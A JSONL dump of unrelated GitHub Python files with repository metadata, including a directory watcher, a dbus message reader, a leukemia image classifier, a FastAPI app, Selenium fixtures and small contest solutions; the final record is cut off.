e:\n # The file vanished since our last safety check\n # or is otherwise unobservable since it was queued.\n _logger.error('Error starting to monitor instance: %s' % str(e))\n pass # Decline to observe\n\n # Review monitored files\n for path in list(data.keys()):\n if not isfile(path):\n del 
data[path]\n continue\n instance = data.get(path) # Shorthand\n try:\n size = getsize(path)\n if size != instance.size:\n # Update time.\n instance.size = size\n instance.time = time()\n continue\n\n if time() - instance.time >= self.__rest_time:\n if instance.size:\n # Only process the file if it has content.\n _logger.info(f'File at rest: {_colour_path(path)}')\n self.__queue_out.put((instance.size, path))\n del data[path]\n\n except OSError as e:\n _logger.error(f'Error monitoring instance: {e}')\n del data[path]\n continue\n\n # We do not want to do this in the loop-condition.\n if self.__done and not data:\n break\n\n sleep(0.1)\n\n@dataclass\nclass MonitorInstance:\n size: int\n time: float\n\n def __eq__(self, other):\n return self.path == other.path\n\n def __ge__(self, other):\n return self.size >= other.size\n\n def __gt__(self, other):\n return self.size > other.size\n\n def __lt__(self, other):\n return self.size < other.size\n\nclass WorkerThread(Thread):\n def __init__(self, script: str, queue: PriorityQueue):\n Thread.__init__(self)\n self.__done = False\n self.__queue = queue\n self.__script = script\n\n def set_done(self):\n self.__done = True\n\n def run(self):\n while True:\n try:\n size, path = self.__queue.get(timeout=0.2)\n except empty:\n if self.__done:\n break\n continue\n\n if not isfile(path):\n # One last isfile for safety.\n # The file could have been removed after it was added to the queue\n # For now, intentionally ignoring silently.\n continue\n\n if not isfile(self.__script):\n _logger.error(f'Script is no longer available: {_colour_path(self.__script)}')\n continue\n\n if not _is_executable(self.__script):\n _logger.error(f'Script is no longer executable: {_colour_path(self.__script)}')\n continue\n\n _logger.info(f'Handling file: {_colour_path(path)}')\n p = cmd([self.__script, path], stdout=devnull, stderr=devnull)\n p.communicate()\n if p.returncode:\n _logger.error(f'Error with file: {_colour_path(path)}')\n else:\n _logger.info(f'Finished with file: {_colour_path(path)}')\n\nif __name__ == '__main__':\n exit(_main(argv[1:])) # pragma no cover\n","repo_name":"adeutscher/core-tools","sub_path":"scripts/files/watch_directory.py","file_name":"watch_directory.py","file_ext":"py","file_size_in_byte":11432,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"11862809552","text":"import logging\nimport socket\nfrom typing import Callable, Optional\n\nfrom .._private.unmarshaller import Unmarshaller\nfrom ..message import Message\n\n\ndef build_message_reader(\n sock: Optional[socket.socket],\n process: Callable[[Message], None],\n finalize: Callable[[Optional[Exception]], None],\n negotiate_unix_fd: bool,\n) -> Callable[[], None]:\n \"\"\"Build a callable that reads messages from the unmarshaller and passes them to the process function.\"\"\"\n unmarshaller = Unmarshaller(None, sock, negotiate_unix_fd)\n\n def _message_reader() -> None:\n \"\"\"Reads messages from the unmarshaller and passes them to the process function.\"\"\"\n try:\n while True:\n message = unmarshaller._unmarshall()\n if message is None:\n return\n try:\n process(message)\n except Exception as e:\n logging.error(\n \"Unexpected error processing message: %s\", exc_info=True\n )\n # If we are not negotiating unix fds, we can stop reading as soon as we have\n # the buffer is empty as asyncio will call us again when there is more data.\n if (\n not negotiate_unix_fd\n and not unmarshaller._has_another_message_in_buffer()\n ):\n return\n 
except Exception as e:\n finalize(e)\n\n return _message_reader\n","repo_name":"Bluetooth-Devices/dbus-fast","sub_path":"src/dbus_fast/aio/message_reader.py","file_name":"message_reader.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"40"} +{"seq_id":"44115971331","text":"from tkinter import *\n\n\nmain = Tk()\nmain.title('YoYo')\nmain.iconbitmap('Mine.ico')\n\n# Frame (that can contain other stuff!) to separate out things visually!\nmy_frame = LabelFrame(main, text='My Frame', padx=360, pady=180)\nmy_frame.pack(padx=8, pady=8)\n# Putting other stuff\nb = Button(my_frame, text='What\\'s up?')\nb.pack() # grid can always be used!\n\nmain.mainloop()\n","repo_name":"samyak1409/tkinter","sub_path":"Codes/7_Frame.py","file_name":"7_Frame.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"73928992441","text":"import requests\nimport urllib3\nfrom constants import APP_ACCESS_TOKEN, BASE_URL\nfrom get_user_id import get_user_id\n\n#defining class\ndef get_users_post(insta_username):\n #function logic\n user_id = get_user_id(insta_username)\n if user_id is None:\n print('The user does not exist')\n exit()\n req_url = BASE_URL + 'users/' + user_id + '/media/recent/?access_token=' + APP_ACCESS_TOKEN\n media_user = requests.get(req_url).json()\n if media_user['meta']['code'] == 200:\n if len(media_user['data']):\n rec_img = media_user['data'][0]['images']['standard_resolution']['url']\n urllib3.disable_warnings()\n conn = urllib3.PoolManager()\n response = conn.request('GET', rec_img)\n f = open('user_post.jpg', 'wb')\n f.write(response.data)\n f.close()\n print('Your post was downloaded')\n else:\n print('Post does not exist!')\n else:\n print('Status code other than 200 received!')\n\n\n","repo_name":"GauravTiwari07/instabot","sub_path":"get_user_posts.py","file_name":"get_user_posts.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74305128440","text":"import os\r\nfrom sklearn import metrics\r\nimport keras\r\nimport tensorflow as tf\r\nfrom glob import glob\r\nimport cv2\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn.model_selection import train_test_split\r\nfrom keras import layers\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n# Dataset Import\r\nfrom zipfile import ZipFile\r\n\r\ndata_path = 'Leukemia.zip'\r\n\r\nwith ZipFile(data_path) as zip:\r\n zip.extractall('leukemia')\r\n\r\n\r\n# Data Preparation\r\ntrain_path = 'C-NMC_Leukemia/training_data'\r\ntest_path = 'C-NMC_Leukemia/testing_data'\r\nval_path = 'C-NMC_Leukemia/validation_data'\r\n\r\nclasses = os.listdir(f'{train_path}')\r\n\r\nIMG_SIZE = 256\r\nSPLIT = 0.2\r\nEPOCHS = 100\r\nBATCH_SIZE = 61\r\n\r\nX = []\r\nY = []\r\n\r\nresize_list = [train_path, test_path]\r\n\r\nfor p in range(len(resize_list)):\r\n for i, name in enumerate(classes):\r\n images = glob(f'{resize_list[p]}/{name}/*.bmp')\r\n\r\n for image in images:\r\n img = cv2.imread(image)\r\n\r\n X.append(cv2.resize(img, (IMG_SIZE, IMG_SIZE)))\r\n Y.append(i)\r\nX = np.asarray(X)\r\none_h_enc_Y = pd.get_dummies(Y).values\r\n\r\nX_train, X_test, Y_train, Y_test = train_test_split(X, one_h_enc_Y, test_size= SPLIT, random_state= 42)\r\n\r\n\r\n# Creating Model\r\nIMG_SHAPE = (IMG_SIZE, IMG_SIZE, 3)\r\n\r\nbase_model = 
tf.keras.applications.efficientnet.EfficientNetB3(include_top= False, weights= \"imagenet\", input_shape= IMG_SHAPE, pooling= 'max')\r\n\r\n\r\nmodel = keras.Sequential([\r\n base_model,\r\n layers.BatchNormalization(axis= -1, momentum= 0.99, epsilon= 0.001),\r\n layers.Dense(256, activation= 'relu'),\r\n layers.Dropout(rate= 0.45, seed= 123),\r\n layers.Dense(2, activation= 'softmax')\r\n])\r\n\r\nmodel.compile(optimizer= 'adam', loss='categorical_crossentropy', metrics= ['accuracy'])\r\nprint(model.summary())\r\n\r\n\r\n# Callbacks\r\nfrom keras.callbacks import ModelCheckpoint\r\n\r\ncheckpoint = ModelCheckpoint('output/model_chechpoint.h5',\r\n save_best_only= True,\r\n verbose= 1,\r\n save_weights_only= True,\r\n monitor='val_accuracy')\r\n\r\n\r\n# Model Training\r\nhistory = model.fit(X_train, Y_train,\r\n validation_data= (X_test, Y_test),\r\n batch_size= BATCH_SIZE,\r\n epochs= EPOCHS,\r\n verbose= 1,\r\n callbacks= checkpoint)\r\n","repo_name":"kynivv/Leukemia_Cell_Classification_EfficientNet_CNN","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27750377260","text":"def solution(s):\n answer = -1\n temp = []\n \n for c in s:\n temp.append(c)\n temp_chr = temp[-2:]\n \n if len(temp)>=2 and temp_chr[0] == temp_chr[1]:\n temp.pop()\n temp.pop()\n \n if not temp:\n answer = 1\n else:\n answer = 0\n\n return answer","repo_name":"khj1998/ProblemSolving","sub_path":"프로그래머스/lv2/12973. 짝지어 제거하기/짝지어 제거하기.py","file_name":"짝지어 제거하기.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"19825026545","text":"## QUESTÃO 1 ## \n# Faça um programa que calcule o aumento de um salário. Ele deve solicitar o \n# valor do salário e a porcentagem do aumento. Exiba o valor do aumento e do \n# novo salário. \n##\n\n##\n# A sua resposta da questão deve ser desenvolvida dentro da função main()!!! \n# Deve-se substituir o comado print existente pelo código da solução.\n# Para a correta execução do programa, a estrutura atual deve ser mantida,\n# substituindo apenas o comando print(questão...) existente.\n##\ndef main():\n print(\"questao 1\")\nx = int(input(\"Qual seu salário atual? \"))\ny = int(input(\"Qual o percentual de aumento? 
\"))\nz = y * x / 100\nx += z\nprint(\"Seu novo salário será \" + str(x))\n\nif __name__ == '__main__':\n main()\n","repo_name":"cesarschool/cesar-school-fp-2018-2-lista1-gabrielleite751","sub_path":"questoes/questao_1.py","file_name":"questao_1.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6729264504","text":"P = int(input())\nsw, em, ai, no = 0, 0, 0, 0\n\nfor i in range(P):\n G, C, N = map(int, input().split())\n if G <= 1:\n no += 1\n continue\n\n if C == 1 or C == 2:\n sw += 1\n elif C == 3:\n em += 1\n else:\n ai += 1\n\nprint(sw)\nprint(em)\nprint(ai)\nprint(no)\n","repo_name":"woohyunjng/Coding-Practice","sub_path":"Python/Baekjoon/28000/28289.py","file_name":"28289.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7938118296","text":"\nimport ast\nimport random\n\n# 生成数据的一个小脚本\n\ndef productUserData():\n dataList = []\n # # add 接口\n # addJson = {\n # \"urlpath\": \"user/login\",\n # \"needparam\": True,\n # \"param\": []\n # }\n # param = []\n # for i in range(10):\n # param.append({\n # \"userid\": i,\n # \"name\": \"testuser\" + str(i),\n # \"birthday\": \" 2022-01-01-01\",\n # \"email\": \"microserivce_userName\" + str(i) + \"@163.com\",\n # \"sex\" : random.randint(0, 2),\n # \"phone\": \"121231233\" + str(i),\n # \"type\" : random.randint(0, 4),\n # \"password\" : \"testuser\" + str(i)\n # })\n # addJson['param'] = param\n # dataList.append(addJson)\n\n # get接口\n getJson = {\n \"urlpath\": \"user/getUserInfoById\",\n \"needparam\": True,\n \"param\": []\n }\n param = []\n for i in range(20):\n param.append({\n \"id\":random.randint(0,9)\n })\n getJson['param'] = param\n dataList.append(getJson)\n\n # # login接口\n # loginJson = {\n # \"urlpath\": \"user/login\",\n # \"needparam\": True,\n # \"param\":[]\n # }\n # param = []\n # for i in range(10):\n # param.append(\n # {\n # \"username\": \"testuser\" + str(i),\n # \"password\": \"testuser\" + str(i)\n # }\n # )\n # loginJson['param'] = param\n # dataList.append(loginJson)\n #\n # removeJson = {\n # \"urlpath\": \"user/remove\",\n # \"needparam\": True,\n # \"param\": []\n # }\n # param = []\n # for i in range(20):\n # param.append({\n # \"id\": random.randint(0, 9)\n # })\n # removeJson['param'] = param\n # dataList.append(removeJson)\n\n return dataList\n\n\n\ndef productNotificationData():\n dataList = []\n # add 接口\n addJson = {\n \"urlpath\": \"user/login\",\n \"needparam\": True,\n \"param\": []\n }\n param = []\n for i in range(10):\n param.append({\n \"userid\": i,\n \"name\": \"testuser\" + str(i),\n \"birthday\": \" 2022-01-01-01\",\n \"email\": \"microserivce_userName\" + str(i) + \"@163.com\",\n \"sex\" : random.randint(0, 2),\n \"phone\": \"121231233\" + str(i),\n \"type\" : random.randint(0, 4),\n \"password\" : \"testuser\" + str(i)\n })\n addJson['param'] = param\n dataList.append()\n\n\n\n\nif __name__ == '__main__':\n filename = 'basicuser1'\n dataList = productUserData()\n with open(filename, 'w') as f:\n f.write(str(dataList))\n f.close()\n\n # filename = 'basicuser'\n # f = open(filename, 'r')\n # data = ast.literal_eval(f.read())\n # print(data)","repo_name":"SeptemberHX/MeasuringTools","sub_path":"requestBody/productData.py","file_name":"productData.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} 
+{"seq_id":"19667279647","text":"\"\"\"\r\n割りとシンプルなDFSだったので実装出来なかったのは悔しい\r\nとりあえず実装してからチョロチョロ修正するのが良かったかも\r\n\r\n1. グラフを作ってDFS\r\n1. 行きがけにまず配列に親を追加\r\n1. その後に子のDFSを行って終わったら親を追加して通り道を記録する\r\n1. あとは答えを+1ずつして答える\r\n\"\"\"\r\nimport sys\r\ninput = sys.stdin.readline\r\nsys.setrecursionlimit(10 ** 6)\r\ndef main():\r\n def dfs(v, p=-1):\r\n ans.append(v)\r\n for v2 in g[v]:\r\n if v2 == p: continue\r\n dfs(v2, v)\r\n ans.append(v)\r\n return\r\n n = int(input())\r\n g = [[] for _ in range(n)]\r\n for _ in range(n-1):\r\n a, b = map(int, input().split())\r\n a -= 1\r\n b -= 1\r\n g[a].append(b)\r\n g[b].append(a)\r\n ans = []\r\n for i in range(n):\r\n if not g[i]: continue\r\n g[i].sort()\r\n\r\n dfs(0)\r\n for i in range(len(ans)):\r\n ans[i] += 1\r\n print(*ans)\r\n return\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"kazumasa-torii/atcoder","sub_path":"abc/213/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70911547319","text":"class Cake:\n \"\"\"\n Tutaj jest dekumentowanie klasy\n \"\"\"\n bakery_offer = []\n\n def __init__(self, name, kind, taste, additives, filling):\n \"\"\"\n\n :param name: v\n :param kind: fag\n :param taste: sf\n :param additives: sdd\n :param filling: ddsa\n \"\"\"\n self.name = name\n self.kind = kind\n self.taste = taste\n self.additives = additives.copy()\n self.filling = filling\n self.bakery_offer.append(self)\n\n def show_info(self):\n print(\"{}\".format(self.name.upper()))\n print(\"Kind: {}\".format(self.kind))\n print(\"Taste: {}\".format(self.taste))\n if len(self.additives) > 0:\n print(\"Additives:\")\n for a in self.additives:\n print(\"\\t\\t{}\".format(a))\n if len(self.filling) > 0:\n print(\"Filling: {}\".format(self.filling))\n print('-' * 20)\n\n @property\n def full_name(self):\n \"\"\"\n fdsafm\n :return:fsav\n \"\"\"\n\n return \"--== {} - {} ==--\".format(self.name.upper(), self.kind)\n\nhelp(Cake)\nprint(\"@\"*40)\nhelp(Cake.full_name)","repo_name":"dandeiro1992/kurs_stacjonarka","sub_path":"Lab1/dokumentacja.py","file_name":"dokumentacja.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36039631000","text":"import sys\n\nfrom trezorlib.debuglink import DebugLink\nfrom trezorlib.transport import enumerate_devices\n\n\ndef find_debug() -> DebugLink:\n for device in enumerate_devices():\n try:\n debug_transport = device.find_debug()\n debug = DebugLink(debug_transport, auto_interact=False)\n debug.open()\n return debug\n except Exception:\n continue\n else:\n print(\"No suitable Trezor device found\")\n sys.exit(1)\n\n\ndef main() -> None:\n debug = find_debug()\n debug.memory_write(int(sys.argv[1], 16), bytes.fromhex(sys.argv[2]), flash=True)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"trezor/trezor-firmware","sub_path":"python/tools/mem_write.py","file_name":"mem_write.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":1147,"dataset":"github-code","pt":"40"} +{"seq_id":"21026020082","text":"import os\nimport pickle\nimport shutil\nimport numpy as np\nimport pandas as pd\nimport scipy as sp\nimport torch.nn as nn\nimport torch\n\nfrom src.dataset import TabDataModule\nfrom src.utils.metrics import compute_metrics, dump_metrics\nfrom src.utils.other import apply_model\n\n\nclass Trainer:\n def __init__(\n self,\n model: 
nn.Module,\n datamodule: TabDataModule,\n optimizer: torch.optim.Optimizer,\n loss_fn: nn.Module,\n run_dir: str\n ):\n self.model = model\n self.datamodule = datamodule\n self.optimizer = optimizer\n self.loss_fn = loss_fn\n self.run_dir = run_dir\n\n self.checkpoints_dir = os.path.join(self.run_dir, 'checkpoints')\n\n def train(self, n_epochs: int, batch_size: int, report_frequency: int):\n self._create_checkpoints_dir()\n self._save_split()\n\n train_dataloader = self.datamodule.get_dataloader('train', batch_size, shuffle=True)\n for epoch in range(1, n_epochs + 1):\n self.model.train()\n\n epoch_losses = []\n for iteration, batch in enumerate(train_dataloader):\n self.optimizer.zero_grad()\n\n x_batch, y_batch = batch\n \n predict = apply_model(self.model, *x_batch)\n predict = predict.squeeze(1)\n\n loss = self.loss_fn(predict, y_batch)\n loss.backward()\n\n epoch_losses.append(loss.detach().cpu().numpy())\n \n self.optimizer.step()\n \n # if iteration % report_frequency == 0:\n # print(f'(epoch) {epoch:3d} (iteration) {iteration:5d} (loss) {loss.item():.4f}')\n\n train_metrics, train_loss = self._evaluate('train', batch_size)\n val_metrics, val_loss = self._evaluate('val', batch_size)\n\n print(\n f'Epoch {epoch:03d} | '\n f'Train auroc {train_metrics[\"auroc\"]:.4f}, auprc: {train_metrics[\"auprc\"]:.4f} | '\n f'Val auroc {val_metrics[\"auroc\"]:.4f}, auprc: {val_metrics[\"auprc\"]:.4f} | '\n f'Loss train {train_loss:.4f}, val {val_loss:.4f}'\n )\n \n self._save_checkpoint(self.model, epoch, self.checkpoints_dir)\n self._save_metrics(\n {'train': train_metrics, 'val': val_metrics},\n {'train': train_loss, 'val': val_loss},\n epoch\n )\n self._save_loss(epoch_losses)\n\n @torch.no_grad()\n def _evaluate(self, part_name: str, batch_size: int):\n self.model.eval()\n\n dataloader = self.datamodule.get_dataloader(part_name, batch_size, shuffle=False)\n\n predict = []\n target = []\n for batch in dataloader:\n x_batch, y_batch = batch\n\n predict.append(apply_model(self.model, *x_batch))\n target.append(y_batch)\n\n predict = torch.cat(predict).squeeze(1).cpu().numpy()\n predict = np.round(sp.special.expit(predict))\n\n target = torch.cat(target).cpu().numpy()\n\n loss = float(self.loss_fn(torch.tensor(predict), torch.tensor(target)).cpu())\n metrics = compute_metrics(predict, target)\n\n return metrics, loss\n \n def _save_split(self):\n save_path = os.path.join(self.run_dir, 'datamodule.pickle')\n\n self.datamodule.split.save(save_path)\n \n def _save_loss(self, epoch_losses: list):\n save_path = os.path.join(self.run_dir, 'loss.npy')\n\n current_losses = np.array(epoch_losses)\n\n if not os.path.exists(save_path):\n np.save(save_path, current_losses)\n else:\n saved_losses = np.load(save_path)\n new_losses = np.concatenate((saved_losses, current_losses))\n\n np.save(save_path, new_losses)\n\n def _save_metrics(self, metrics, loss, epoch: int):\n save_path = os.path.join(self.run_dir, 'train_val_metrics.csv')\n\n current_metrics = pd.DataFrame.from_dict({\n 'epoch': [epoch],\n 'train_auprc': [metrics['train']['auprc']],\n 'val_auprc': [metrics['val']['auprc']],\n 'train_auroc': [metrics['train']['auroc']],\n 'val_auroc': [metrics['val']['auroc']],\n 'train_loss': [loss['train']],\n 'val_loss': [loss['val']],\n })\n\n if not os.path.exists(save_path):\n current_metrics.to_csv(save_path, index=False)\n else:\n saved_metrics = pd.read_csv(save_path)\n new_metrics = pd.concat((saved_metrics, current_metrics))\n\n new_metrics.to_csv(save_path, index=False)\n\n def 
_create_checkpoints_dir(self):\n if os.path.exists(self.checkpoints_dir):\n shutil.rmtree(self.checkpoints_dir)\n os.makedirs(self.checkpoints_dir)\n\n def _save_checkpoint(\n self,\n model: nn.Module,\n epoch: int,\n experiment_dir: str,\n ): \n checkpoint_path = os.path.join(experiment_dir, f'{str(epoch).zfill(4)}.pt')\n torch.save(\n {\n 'model_state_dict': model.state_dict(),\n 'epoch': epoch\n },\n checkpoint_path\n )\n \n ","repo_name":"daniilkk/TabDL-Credit-Scoring","sub_path":"src/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":5257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9036017578","text":"import time\r\nseconds = input(\"Enter the number of seconds: \")\r\ndef count_down(seconds):\r\n while seconds>0:\r\n mins = int(seconds/60)\r\n sec = int(seconds%60)\r\n timer = f'{mins}:{sec}'\r\n #print(timer)\r\n print(timer,end=\"\\r\")\r\n time.sleep(1) \r\n seconds=seconds-1\r\n print(\"Times Up!!!\")\r\n\r\ncount_down(int(seconds))\r\n\r\n","repo_name":"NamanP18/P110","sub_path":"C110.py","file_name":"C110.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41289776566","text":"#!/usr/bin/env python3\n\"\"\" Optimize k \"\"\"\n\nimport numpy as np\n\nkmeans = __import__('1-kmeans').kmeans\nvariance = __import__('2-variance').variance\n\n\ndef optimum_k(X, kmin=1, kmax=None, iterations=1000):\n \"\"\" tests for the optimum number of clusters by variance\n\n Arguments:\n X ndarray (n, d) dataset to cluster\n n number of data points\n d number of dimensions f0r each data point\n kmin positive int, minimum number of clusters to check f0r (inclusive)\n kmax positive int, maximum number of clusters to check f0r (inclusive)\n iterations positive int, maximum number of iterations f0r K-means\n\n Returns:\n results, d_vars, or None, None on failure\n \"\"\"\n if not isinstance(X, np.ndarray) or len(X.shape) != 2:\n return None, None\n if not isinstance(iterations, int) or iterations <= 0:\n return None, None\n if not isinstance(kmin, int) or kmin <= 0 or X.shape[0] <= kmin:\n return None, None\n if kmax is None:\n kmax = X.shape[0]\n if not isinstance(kmax, int) or kmax <= 0 or X.shape[0] < kmax:\n return None, None\n if kmin >= kmax:\n return None, None\n\n results = []\n d_vars = []\n\n for k in range(kmin, kmax + 1):\n C, clss = kmeans(X, k, iterations)\n\n if C is None or clss is None:\n return None, None\n\n results.append((C, clss))\n d_vars.append(variance(X, C))\n\n max = np.max(d_vars)\n for i in range(len(d_vars)):\n d_vars[i] = abs(d_vars[i] - max)\n\n return results, d_vars\n","repo_name":"tlenormand/holbertonschool-machine_learning","sub_path":"unsupervised_learning/clustering/3-optimum.py","file_name":"3-optimum.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26265300886","text":"import re\nfrom common import read_json_from_file, write_to_file, DATA_FOLDER\nfrom scraper import PREREQ_FILE_PATH\n\nPARSED_PREREQ_PATH = DATA_FOLDER + 'parsed_prereq.txt'\nCOURSE_REGEX = r'[A-Z]{2,4}\\s\\d{3}'\n\nKEYWORD_DICT = {\n '; or': 'or',\n ';': 'and',\n 'One of': 'or',\n 'Any of': 'or'\n}\n\n\ndef remove_prereq_string(prereqs):\n for course, value in prereqs.items():\n prereqs[course] = value[len(\"Prerequisite: \"):]\n\n\ndef get_prereq_from_string(string):\n result = {}\n if string.find('; 
or') > -1:\n prereqs = string.split('; or')\n temp = []\n for prereq in prereqs:\n res = get_prereq_from_string(prereq)\n if len(res) > 0:\n temp.append(res)\n if len(temp) == 1:\n return temp[0]\n else:\n result[KEYWORD_DICT['; or']] = temp\n elif string.find('; ') > -1:\n prereqs = string.split('; ')\n temp = []\n for prereq in prereqs:\n res = get_prereq_from_string(prereq)\n if len(res) > 0:\n temp.append(res)\n if len(temp) == 1:\n return temp[0]\n else:\n result[KEYWORD_DICT[';']] = temp\n elif string.find('One of') > -1 or string.find(' or ') > -1 or string.find('Any of') > -1:\n courses = re.findall(COURSE_REGEX, string)\n if len(courses) > 1:\n result['or'] = courses\n elif len(courses) > 0:\n return courses[0]\n else:\n return []\n elif string.find(' and ') > -1:\n courses = re.findall(COURSE_REGEX, string)\n if len(courses) > 1:\n result['and'] = courses\n elif len(courses) > 0:\n return courses[0]\n else:\n return []\n else:\n temp = re.findall(COURSE_REGEX, string)\n if len(temp) == 1:\n return temp[0]\n else:\n return temp\n return result\n\n\nif __name__ == \"__main__\":\n prereqs = read_json_from_file(PREREQ_FILE_PATH)\n merged = {}\n for d in prereqs:\n merged.update(d)\n prereqs = merged\n remove_prereq_string(prereqs)\n\n courses_to_remove = []\n for course, value in prereqs.items():\n classes = re.findall(COURSE_REGEX, value)\n if len(classes) == 0:\n courses_to_remove.append(course)\n [prereqs.pop(course) for course in courses_to_remove]\n\n converted_prereq = {}\n for course, prereq in prereqs.items():\n converted_prereq[course] = get_prereq_from_string(prereq)\n\n for course in converted_prereq:\n print(course)\n print(prereqs[course])\n print(converted_prereq[course])\n print('')\n\n write_to_file(converted_prereq, PARSED_PREREQ_PATH)\n","repo_name":"suoigwg/cs411-gpa-by-class","sub_path":"prereq/prereq.py","file_name":"prereq.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"23983680547","text":"import pytest\nfrom _pytest.fixtures import FixtureRequest\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom webdriver_manager.utils import ChromeType\n\nfrom ui.pages.login_page import LoginPage\nfrom ui.pages.welcome_page import WelcomePage\n\n\n@pytest.fixture(scope='function')\ndef driver(app_full_url, request: FixtureRequest):\n selenoid = request.config.getoption('--selenoid')\n\n if selenoid:\n capabilities = {\n \"browserName\": \"chrome\",\n \"browserVersion\": \"87.0\",\n \"selenoid:options\": {\n \"enableVNC\": True,\n \"enableVideo\": False\n }\n }\n driver = webdriver.Remote(\n command_executor=\"http://{}/wd/hub\".format(selenoid),\n desired_capabilities=capabilities)\n else:\n manager = ChromeDriverManager(chrome_type=ChromeType.CHROMIUM, log_level=0)\n driver = webdriver.Chrome(manager.install())\n\n driver.maximize_window()\n driver.get(app_full_url)\n yield driver\n driver.quit()\n\n\n@pytest.fixture(scope='function')\ndef welcome_page(new_user, driver):\n LoginPage(driver).auth(new_user.username, new_user.password)\n\n return WelcomePage(driver)\n","repo_name":"Onethity/2020-2-Atom-QA-Python-D-Lukianov","sub_path":"Final project/ui/fixtures.py","file_name":"fixtures.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70627712440","text":"from fastapi import Depends, FastAPI\nfrom fastapi.middleware.cors 
import CORSMiddleware\n\nfrom routers import user\nfrom routers import emailreport\nfrom routers import user\nfrom routers import timezone, tz_conversion\n\nfrom routers import news\nfrom routers import notifications\nfrom routers import filtersort\n\nfrom routers import location\nfrom routers import wordAnalysis\nfrom routers import login, registration, dummyhome\nimport db\nfrom add_activity_api.main import app as add_activity_app\nfrom routers.on_twitter import api_on_twitter\n\n\n\napp = FastAPI()\napp.include_router(add_activity_app)\n@app.get(\"/docs\", include_in_schema=False)\nasync def custom_swagger_ui_html(req):\n root_path = req.scope.get(\"root_path\", \"\").rstrip(\"/\")\n openapi_url = root_path+ 'api/' + app.openapi_url\n return get_swagger_ui_html(\n openapi_url=openapi_url,\n title=\"API\",\n )\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=['*'],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\napp.include_router(\n user.router,\n prefix=\"/user\",\n tags=[\"user\"],\n)\n\napp.include_router(\n\n\n emailreport.router,\n prefix=\"/emailreport\",\n tags=[\"emailreport\"],\n)\n\n\napp.include_router(\n timezone.router,\n prefix=\"/timezone\",\n tags=[\"timezone\"],\n)\n\napp.include_router(\n wordAnalysis.router,\n prefix=\"/word\",\n tags=[\"word\"],\n)\napp.include_router(\n tz_conversion.router,\n prefix=\"/tz_conversion\",\n tags=[\"tz_conversion\"],\n\n)\n\napp.include_router(\n notifications.router,\n prefix=\"/notifications\",\n tags=[\"notifications\"],\n)\napp.include_router(\n\n filtersort.router,\n prefix=\"/filtersort\",\n tags=[\"filtersort\"],\n)\napp.include_router(\n news.router,\n prefix=\"/news\",\n tags=[\"news\"], \n)\napp.include_router(\n location.router,\n prefix=\"/location\",\n tags=[\"location\"],\n)\n\napp.include_router(\n registration.router,\n prefix=\"/registration\",\n tags=[\"registration\"],\n)\n\napp.include_router(\n login.router,\n prefix=\"/login\",\n tags=[\"login\"],\n)\n\napp.include_router(\n dummyhome.router,\n prefix=\"/dummyhome\",\n tags=[\"dummyhome\"],\n)\n@app.get(\"/\")\nasync def root():\n return {\"message\": \"Hello Bigger Applications, check!\"}\n\n@app.get(\"/ping\")\nasync def root():\n return {\"message\": \"pong\"}\n\n@app.get(\"/dbtest\")\nasync def dbtest():\n hasan = []\n cur = db.conn.cursor()\n cur.execute(\"SELECT username FROM user_details\")\n for row in cur:\n for i in row:\n hasan.append(i)\n return{\"message\": hasan}\n\napp.include_router(\n api_on_twitter.router,\n prefix=\"/on-twitter\",\n tags=[\"on-twitter\"],\n)\n\n","repo_name":"bounswe/bounswe2023group2","sub_path":"practice-app/server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"40"} +{"seq_id":"13016179242","text":"import zmq\r\nimport random\r\n\r\ncontext = zmq.Context()\r\n\r\n\r\ndef random_word():\r\n word_list = []\r\n with open('gen_z_slang_words.txt', 